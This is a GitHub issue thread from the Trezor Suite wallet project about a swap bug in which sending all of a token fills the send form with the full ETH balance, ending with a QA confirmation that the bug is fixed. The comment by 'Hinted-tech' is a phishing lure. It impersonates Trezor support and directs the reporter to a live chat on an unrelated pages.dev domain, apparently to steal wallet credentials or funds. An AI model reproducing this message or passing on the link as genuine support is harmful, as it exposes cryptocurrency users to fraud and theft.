### ISSUE TITLE
Trade - when sending all tokens, in send form is ETH all balance

### ISSUE THREAD

**Issue by adderpositive** [trezor/trezor-suite#15734]
## Description

Swap All ANKR to ETH - will show All balance of ETH

![image](https://github.com/user-attachments/assets/81ad3702-d2f5-4eed-8351-72977a07ddb1)
![image](https://github.com/user-attachments/assets/afcaf84f-9476-4652-8458-1ab562d7d9da)

**Comment by Hinted-tech** [comment]
> ## Description
> Swap All ANKR to ETH - will show All balance of ETH
> 
> ![image](https://private-user-images.githubusercontent.com/15160619/391980912-81ad3702-d2f5-4eed-8351-72977a07ddb1.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMyMzMxMjcsIm5iZiI6MTczMzIzMjgyNywicGF0aCI6Ii8xNTE2MDYxOS8zOTE5ODA5MTItODFhZDM3MDItZDJmNS00ZWVkLTgzNTEtNzI5NzdhMDdkZGIxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjAzVDEzMzM0N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTU0MmM2NzdhMDU1ZjViZGQ5ZDY5NWRmMGE2YmNmMzdmZThhMTc3ZDI1ZTQ4ZjY2ZTlmYmY2NGIyNTNjMGQ5M2QmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.OhSk07guO2PnFsal3oaqVKttLbVePwKUXKibDPfewp8) ![image](https://private-user-images.githubusercontent.com/15160619/391981054-afcaf84f-9476-4652-8458-1ab562d7d9da.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMyMzMxMjcsIm5iZiI6MTczMzIzMjgyNywicGF0aCI6Ii8xNTE2MDYxOS8zOTE5ODEwNTQtYWZjYWY4NGYtOTQ3Ni00NjUyLTg0NTgtMWFiNTYyZDdkOWRhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjAzVDEzMzM0N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ5OWZjNmE1MzBhMzNiZmUzM2RlOTgwMzdjYzBhN2ViMTg0NWVhNjRkOGVhNzQzOGMwMjg0M2U5YjgyYTk4NGImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.gTafT9fKC4w3u5W6L0o_UueE0i0BfH1D413mq6NDV9A)

We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Trezor Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by bosomt** [comment]
**QA OK**

looks like this now

![Image](https://github.com/user-attachments/assets/170fd855-6c42-4627-aa85-c54bc983d6c6)
![Image](https://github.com/user-attachments/assets/714f97e8-aa7c-4bad-9013-b85ec03eb836)

**Info:**
 - Suite version: web 25.1.0 (d92f6c4120253f1dd7c9880611f4c4442481d825)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.6 regular (revision 2625facf1fe9b71db120439853ceca0a61bb8396)
 - Transport: WebUsbTransport
